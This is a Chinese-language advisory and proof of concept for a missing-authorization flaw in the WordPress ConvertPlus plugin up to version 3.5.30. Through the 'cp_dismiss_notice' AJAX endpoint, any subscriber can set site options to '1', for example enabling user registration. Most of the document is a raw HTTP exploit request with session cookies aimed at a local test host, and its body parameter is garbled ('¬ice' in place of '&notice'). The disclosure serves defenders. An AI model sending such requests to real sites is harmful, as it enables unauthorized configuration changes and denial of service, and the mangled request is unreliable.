WordPress 弹窗插件 ConvertPlus <= 3.5.30 - 缺少授权导致已认证(订阅者及以上)用户可更新受限选项
用于 WordPress 的 ConvertPlus 插件由于在 'cp_dismiss_notice' AJAX 端点上缺少能力检查,在所有版本(包括 3.5.30)中容易受到未授权修改数据的影响,从而可能导致拒绝服务。这使得已认证的攻击者(具有订阅者级别及以上访问权限)能够将 WordPress 站点上的选项值更新为 '1'。此漏洞可被利用来更新某个选项,从而在站点上产生错误并对合法用户拒绝服务,或者被用于将某些值设置为 true,例如注册。
备注
它只会在数据库中写入 1,因此你只能在 users_can_register 中填入 1
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011
action=cp_dismiss_notice¬ice=users_can_register